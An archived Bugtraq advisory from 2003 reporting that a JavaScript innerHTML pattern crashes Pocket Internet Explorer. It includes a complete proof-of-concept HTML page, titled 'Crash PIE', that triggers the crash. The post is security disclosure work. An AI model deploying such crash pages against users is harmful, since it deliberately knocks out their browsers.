[28357] in bugtraq
JS Bug makes it possible to deliberately crash Pocket PC IE
daemon@ATHENA.MIT.EDU (Christopher Sogge =?iso-8859-1?Q?R)
Fri Jan 3 10:50:41 2003
Message-Id: <5.1.0.14.2.20030103094707.00b77738@uio-pop.uio.no>
Date: Fri, 03 Jan 2003 09:56:06 +0100
To: bugtraq@securityfocus.com
From: Christopher Sogge =?iso-8859-1?Q?R=F8tnes?= <crotnes@student.sv.uio.no>
Mime-Version: 1.0
Content-Type: text/plain; charset="us-ascii"; format=flowed
PROBLEM DESCRIPTION:
Calling a javascript from an object written to same page with the
object.innerHTML function causes Pocket Internet Explorer (PIE from now on)
to crash.
SOFTWARE AFFECTED:
Only PIE is affected, "regular" IE will show the pages as intented.
EXAMPLE:
<html>
<head>
<title>Crash PIE</title>
<script language="Javascript">
function displayPage(page){
if(page=="onload"){
main.innerHTML="<a href=\"#\" onClick=\"displayPage('crash');\">Crash
me</a>";
}
if(page=="crash"){
main.innerHTML="<a href=\"#\" onClick=\"displayPage('crash');\">You are
going down!</a>";
}
}
</script>
</head>
<body onLoad="displayPage('onload');">
<hr>
<span id="main"></span>
</body></html>
SOLUTIONS:
no known patch available
Problem was reported to MS (Norway) 2nd of January 2003.
Chris
